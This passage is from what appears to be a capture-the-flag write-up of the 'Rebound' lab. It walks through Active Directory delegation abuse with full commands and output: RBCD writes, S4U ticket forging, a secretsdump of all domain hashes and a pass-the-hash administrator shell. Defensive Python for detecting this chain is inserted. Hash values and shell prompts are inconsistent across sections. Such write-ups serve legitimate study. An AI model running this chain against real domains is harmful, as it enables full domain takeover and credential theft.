LDAPS       rebound.htb     636    DC01             [*] Getting GMSA Passwords
LDAPS       rebound.htb     636    DC01             Account: delegator$           NTLM: 4ba33add1108fe560429fc27a1bcab6b

 

Auth Check

The hash works for SMB and LDAP but not WinRM:

nxc smb dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b

SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\delegator$:4ba33add1108fe560429fc27a1bcab6b 
                                                                                                                                         
nxc ldap dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b -k

SMB         dc01.rebound.htb 445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS       dc01.rebound.htb 636    DC01             [+] rebound.htb\delegator$ 
                                                                                                                                         
nxc winrm dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b    
WINRM       10.10.11.231    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
WINRM       10.10.11.231    5985   DC01             [-] rebound.htb\delegator$:4ba33add1108fe560429fc27a1bcab6b

 

Shell as Administrator

Enumeration

In Bloodhound, looking at the now owned Delegator object, there’s information about delegation:

 

It does not have unconstrained delegation, but it is allowed to delegate to the HTTP service on the dc01 machine object. It also has an SPN of browser/dc01.rebound.htb.

The Impacket script findDelegation.py will also show this:

impacket-findDelegation 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :4ba33add1108fe560429fc27a1bcab6b
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType  DelegationRightsTo    
-----------  -----------------------------------  --------------  ---------------------
delegator$   ms-DS-Group-Managed-Service-Account  Constrained     http/dc01.rebound.htb 

 

Constrained Delegation

Background

To think about constrained delegation, let’s take the example of a web server and a database server. The user authenticates to the webserver by sending it their Service Ticket (ST, also known as a Ticket Granting Service or TGS ticket). The webserver wants to authenticate to the DB as the user, so that it only gets data the user is allowed to access. It sends a special TGS request to the DC asking for a ticket to the DB, attaching the user’s ST / TGS ticket. The DC checks that the webserver is allowed to delegate to the DB server and that the user’s ST / TGS ticket has the forwardable flag. If so, it returns an ST / TGS ticket that says this is the user trying to access the DB. This all makes use of the S4U2Proxy extension.

So what happens if the user doesn’t use Kerberos to authenticate to the web server (perhaps NTLM instead)? The web server needs an ST / TGS ticket for the user to the web server before it can request one for the DB. The web server can request an ST / TGS ticket from the DC for the user to the webserver using the S4U2Self extension. This ticket will only come back with the forwardable flag if the delegation is configured as “Constrained w/ Protocol Transition”.

The delegation above doesn’t have the “w/ Protocol Transition” part, so I can’t just request a ST / TGS ticket and get access as any user to the DC.

Demonstration

To demonstrate this, running getST.py fails:

oxdf@hacky$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :E1630B0E18242439A50E9D8B5F5B7524
Impacket v0.12.0.dev1+20240308.164415.4a62f39 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable

It is using S4U2Self to get a ticket for the administrator user to delegator$, and then trying to use S4U2Proxy to forward it, but it doesn’t work. The -self flag tells getST.py to stop after the S4U2Self, getting a ticket for administrator to delegator$. The resulting ticket is missing the forwardable flag:

[Screenshot: the S4U2Self ticket’s flags, without forwardable]

Resource-Based Constrained Delegation

Background

In the constrained delegation above, the DC tracked on the web server object that it was allowed to delegate (without protocol transition) to the DB. Resource-based constrained delegation is similar, but the DC tracks on the DB object a list of trusted accounts that are allowed to delegate to it, and the resource can modify its own list.

Add ldap_monitor to delegator$

To move forward with this attack, I’m going to set ldap_monitor as a trusted-to-delegate account for delegator$ using the rbcd.py script from Impacket.

  • rebound/delegator$ – The account to target. It will authenticate as this account to the DC.
  • -hashes :E1630B0E18242439A50E9D8B5F5B7524 – The hashes for this account to authenticate with.
  • -k – Use Kerberos authentication (it will use the hash to get a ticket).
  • -delegate-from ldap_monitor – Set that ldap_monitor is allowed to delegate.
  • -delegate-to 'delegator$' – Set that it is allowed to delegate to delegator$.
  • -action write – write sets the value. Other choices for -action are read, remove, and flush.
  • -dc-ip dc01.rebound.htb – Tell it where to find the DC.
  • -use-ldaps – Fixes the binding issues described above.

All of this together updates the RBCD list:

impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps                                                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)


impacket-findDelegation 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k                                      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName   AccountType                          DelegationType              DelegationRightsTo    
------------  -----------------------------------  --------------------------  ---------------------
ldap_monitor  Person                               Resource-Based Constrained  delegator$            
delegator$    ms-DS-Group-Managed-Service-Account  Constrained                 http/dc01.rebound.htb 


One other note – I lost a ton of time getting “invalid server address” errors for not having “dc01” associated with the IP of the box in my /etc/hosts file.

Get ST / TGS Ticket for DC01$ on delegator$

Now, the ldap_monitor account is able to request a service ticket as any user on delegator$. I’m going to target the DC computer account, because the administrator account is marked as sensitive, which gives the NOT_DELEGATED flag:

┌──(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb                                                                    
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 21:22:28] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainUser -Identity Administrator
cn                                : Administrator
description                       : Built-in account for administering the computer/domain
distinguishedName                 : CN=Administrator,CN=Users,DC=rebound,DC=htb
memberOf                          : CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb
                                    CN=Domain Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Schema Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Administrators,CN=Builtin,DC=rebound,DC=htb
name                              : Administrator
objectGUID                        : {37857665-6e2e-4f12-9976-5c9babcd8282}
userAccountControl                : NORMAL_ACCOUNT [1114624]
                                    DONT_EXPIRE_PASSWORD
                                    NOT_DELEGATED
badPwdCount                       : 1
badPasswordTime                   : 06/12/2024 17:01:28 (today)
lastLogoff                        : 1601-01-01 00:00:00+00:00
lastLogon                         : 06/12/2024 13:35:55 (today)
pwdLastSet                        : 08/04/2023 09:11:04 (1 year, 7 months ago)
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-500
adminCount                        : 1
sAMAccountName                    : Administrator
sAMAccountType                    : SAM_USER_OBJECT
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > 

 

There is a cleanup script resetting delegation, so if this doesn’t work, I’ll make sure to re-run the rbcd.py script first. Then I’ll get a ST / TGS ticket as DC01$ on delegator$ with getST.py:

┌──(puck㉿kali)-[~/htb/rebound]
└─$ impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
                                                                                                                                         
┌──(puck㉿kali)-[~/htb/rebound]
└─$ impacket-getST 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

 

 

This saves a ST / TGS ticket as the DC computer account for delegator$ into a file, and this time it is forwardable:

impacket-describeTicket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 4ed4e05588d7c81e2042a0859d466d6c
[*] User Name                     : DC01$
[*] User Realm                    : rebound.htb
[*] Service Name                  : browser/dc01.rebound.htb
[*] Service Realm                 : REBOUND.HTB
[*] Start Time                    : 06/12/2024 21:27:01 PM
[*] End Time                      : 07/12/2024 07:27:01 AM
[*] RenewTill                     : 07/12/2024 21:27:01 PM
[*] Flags                         : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : TtTgVYjXyB4gQqCFnUZtbA==
[*] Kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$1ca3e095d3f03a1f7f1f6c4a$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
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : browser/dc01.rebound.htb
[*]   Service Realm               : REBOUND.HTB
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied


The forwardable flag is what was missing from the ticket above: S4U2Proxy will only accept a forwardable ticket as the additional ticket.
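To make the flag check repeatable, here is an added example (my own code, not part of the writeup or impacket) that decodes the hex flag word impacket-describeTicket prints using the TicketFlags bit layout from RFC 4120 section 5.2.8, where bit 0 is the most significant bit of the 32-bit word. It reports whether a ticket carries the forwardable flag that S4U2Proxy requires. The 0x40a10000 value comes from the output above; the 0x00a10000 comparison value is constructed to stand in for a non-forwardable S4U2Self ticket.

```python
import re

# TicketFlags bit positions from RFC 4120 section 5.2.8.  The flags are an
# ASN.1 BIT STRING, so bit 0 is the most significant bit of the 32-bit word
# that describeTicket prints in hex.
TICKET_FLAG_BITS = {
    0: "reserved", 1: "forwardable", 2: "forwarded", 3: "proxiable",
    4: "proxy", 5: "may_postdate", 6: "postdated", 7: "invalid",
    8: "renewable", 9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate", 14: "anonymous",
    15: "enc_pa_rep",
}

# Matches the "Flags : (0x40a10000) forwardable, ..." line of describeTicket.
FLAGS_LINE = re.compile(r"Flags\s*:\s*\((0x[0-9a-fA-F]+)\)")


def decode_ticket_flags(word: int) -> list[str]:
    """Return the flag names set in a 32-bit TicketFlags word, in bit order."""
    return [name for bit, name in TICKET_FLAG_BITS.items()
            if (word >> (31 - bit)) & 1]


def flags_from_describe_output(text: str) -> int:
    """Pull the hex flag word out of impacket-describeTicket output."""
    match = FLAGS_LINE.search(text)
    if match is None:
        raise ValueError("no Flags line found in describeTicket output")
    return int(match.group(1), 16)


def usable_as_additional_ticket(text: str) -> bool:
    """True when the ticket can be handed to S4U2Proxy as -additional-ticket:
    the KDC rejects a non-forwardable ticket in that role."""
    return "forwardable" in decode_ticket_flags(flags_from_describe_output(text))


# Flag line copied from the describeTicket output above (forwardable ticket).
FORWARDABLE_OUTPUT = "[*] Flags                         : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep"

# Constructed stand-in for an S4U2Self ticket that lacks the forwardable bit.
NON_FORWARDABLE_OUTPUT = "[*] Flags                         : (0x00a10000) renewable, pre_authent, enc_pa_rep"

if __name__ == "__main__":
    for sample in (FORWARDABLE_OUTPUT, NON_FORWARDABLE_OUTPUT):
        word = flags_from_describe_output(sample)
        print(f"{word:#010x}: {', '.join(decode_ticket_flags(word))} "
              f"-> S4U2Proxy additional ticket: {usable_as_additional_ticket(sample)}")
```

The decoded names for 0x40a10000 match the list describeTicket printed, which confirms the bit layout; the constructed 0x00a10000 word differs only in bit 1 and is rejected.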

Another Shot At Constrained Delegation

Create ST / TGS Ticket

Now that I have an ST / TGS ticket for delegator$'s service as DC01$, delegator$ can pass that ticket into S4U2Proxy instead of S4U2Self and, through its constrained delegation to http/dc01.rebound.htb, get an ST for DC01 as DC01$.

impacket-getST -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] 	Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

Dump Hashes

With this ticket as the machine account, I can dump hashes from the DC. The KRB5CCNAME environment variable points to the ticket, and the -k and -no-pass options tell secretsdump (impacket-secretsdump here) to authenticate with it instead of a password:

┌──(puck㉿kali)-[~/htb/rebound]
└─$ export KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' 
klist                                                              
Ticket cache: FILE:DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@rebound.htb

Valid starting       Expires              Service principal
12/06/2024 21:34:42  12/07/2024 07:34:42  http/dc01.rebound.htb@REBOUND.HTB
    renew until 12/07/2024 21:34:42
impacket-secretsdump -no-pass -k dc01.rebound.htb -just-dc-ntlm 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b:::
[*] Cleaning up... 
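
From the DC's side, the two steps just shown (the S4U2Proxy ticket for http/dc01.rebound.htb and the DRSUAPI replication that secretsdump performs) leave traces in the Security log. The following is an added defender-side example, my own code and not part of the writeup or of impacket, that runs two checks over constructed Security events modelled on this chain: a 4769 whose Transited Services field is populated (which only happens when the ticket was issued through S4U2Proxy, i.e. constrained delegation or RBCD), and a 4662 carrying the DS-Replication-Get-Changes control-access-right GUIDs whose logon, matched by Logon ID to a 4624, came from a host that is not a domain controller. The events, the Logon IDs and the 10.10.14.5 source address are constructed; 10.10.11.231 is dc01.rebound.htb from the scan.

```python
# Control-access-right GUIDs that appear in the Properties field of a 4662
# when directory replication is authorised.  secretsdump's DRSUAPI method
# needs both rights on the domain naming context.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Hosts that legitimately replicate: only the DC itself in this single-DC domain.
EXPECTED_REPLICATION_SOURCES = {"10.10.11.231"}  # dc01.rebound.htb

# Constructed events (not real logs), modelled on the writeup's final steps.
# 10.10.14.5 is a made-up attacker address.
SAMPLE_EVENTS = [
    # S4U2Proxy: delegator$ obtains an http/dc01 ticket as DC01$, so the KDC
    # fills Transited Services with the service the request passed through.
    {"id": 4769, "account": "DC01$@REBOUND.HTB", "service": "http/dc01.rebound.htb",
     "transited_services": "browser/dc01.rebound.htb", "ip": "10.10.14.5"},
    # Ordinary TGS request from a user: Transited Services is empty.
    {"id": 4769, "account": "ppaul@REBOUND.HTB", "service": "cifs/dc01.rebound.htb",
     "transited_services": "", "ip": "10.10.11.231"},
    # Network logon as DC01$ from the attacker box, then the replication check.
    {"id": 4624, "account": "DC01$", "logon_id": "0x3a7f2c", "ip": "10.10.14.5"},
    {"id": 4662, "account": "DC01$", "logon_id": "0x3a7f2c",
     "properties": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL]},
    # Benign: the DC's own replication access check from its own address.
    {"id": 4624, "account": "DC01$", "logon_id": "0x1b4", "ip": "10.10.11.231"},
    {"id": 4662, "account": "DC01$", "logon_id": "0x1b4",
     "properties": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL]},
]


def delegated_tickets(events):
    """4769 events whose Transited Services field is non-empty: the service
    ticket was issued through S4U2Proxy (constrained delegation or RBCD).
    Returns (impersonated account, target service, transited service)."""
    return [(e["account"], e["service"], e["transited_services"])
            for e in events
            if e["id"] == 4769 and e.get("transited_services")]


def replication_from_unexpected_hosts(events, expected=EXPECTED_REPLICATION_SOURCES):
    """4662 events with replication GUIDs whose originating logon (joined on
    Logon ID to the matching 4624) came from a host that is not a DC.

    An allow-list keyed on the account alone would miss this chain: the
    replicating account really is DC01$.  The source host is the tell."""
    logon_ip = {e["logon_id"]: e["ip"] for e in events if e["id"] == 4624}
    hits = []
    for e in events:
        if e["id"] != 4662 or not REPLICATION_GUIDS & set(e["properties"]):
            continue
        ip = logon_ip.get(e["logon_id"], "unknown")
        if ip not in expected:
            hits.append((e["account"], ip))
    return hits


if __name__ == "__main__":
    for account, service, via in delegated_tickets(SAMPLE_EVENTS):
        print(f"S4U2Proxy ticket for {service} as {account} via {via}")
    for account, ip in replication_from_unexpected_hosts(SAMPLE_EVENTS):
        print(f"replication rights exercised by {account} from non-DC host {ip}")
```

The join on Logon ID is what makes the second check work: 4662 itself carries no network address, so the 4624 that created the logon session has to supply it. The delegation check is noisy in domains that use constrained delegation legitimately, so in practice it is filtered to high-value target SPNs such as those on domain controllers.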


Shell

With the admin hash, I can pass that to Evil-WinRM to get a shell:

└─$ evil-winrm -i rebound.htb -u administrator -H 176be138594933bb67db3b2572fc91b8
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 


That was a lot of hard work!